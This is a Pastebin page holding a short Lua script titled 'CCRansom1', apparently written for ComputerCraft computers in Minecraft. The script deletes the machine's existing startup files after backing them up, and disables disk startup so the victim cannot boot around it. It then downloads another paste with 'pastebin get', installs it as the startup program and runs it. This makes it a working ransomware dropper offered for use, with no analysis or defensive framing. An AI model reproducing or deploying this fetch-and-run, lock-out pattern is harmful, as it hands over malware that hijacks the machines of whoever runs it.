SuperRavenSn1per

CCRansom1

Mar 19th, 2019
159
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Lua 0.33 KB | None | 0 0
  1. if fs.exists("startup") then
  2.   fs.copy("startup", "backup_startup")
  3.   fs.delete("startup")
  4. end
  5.  
  6. if fs.exists("startup.lua") then
  7.   fs.copy("startup.lua", "backup_startup_lua")
  8.   fs.delete("startup.lua")
  9. end
  10.  
  11. shell.run("pastebin get U85sSNs5 startup")
  12. shell.run("set shell.allow_disk_startup false")
  13. sleep(0.1)
  14. shell.run("startup")
Add Comment
Please, Sign In to add comment